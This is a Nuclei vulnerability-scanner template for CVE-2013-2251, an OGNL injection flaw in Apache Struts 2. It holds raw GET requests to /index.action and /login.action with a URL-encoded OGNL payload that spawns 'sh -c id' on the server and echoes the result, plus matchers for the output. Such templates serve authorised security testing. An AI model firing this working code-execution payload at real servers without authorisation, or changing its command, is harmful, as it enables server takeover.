nuclei-templates/cves/2013/CVE-2013-2251.yaml

id: CVE-2013-2251

info:
  name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
  author: exploitation & @dwisiswant0
  severity: critical
  description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
  tags: cve,cve2013,rce

requests:
  - payloads:
      params:
        - "redirect"
        - "action"
        - "redirectAction"
    raw:
      - |
        GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en        

      - |
        GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 400
        condition: or
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
      - type: word
        words:
          - "There is no Action mapped for namespace"
          - "The origin server did not find a current representation for the target resource"
          - "Apache Tomcat"
        condition: or
        part: body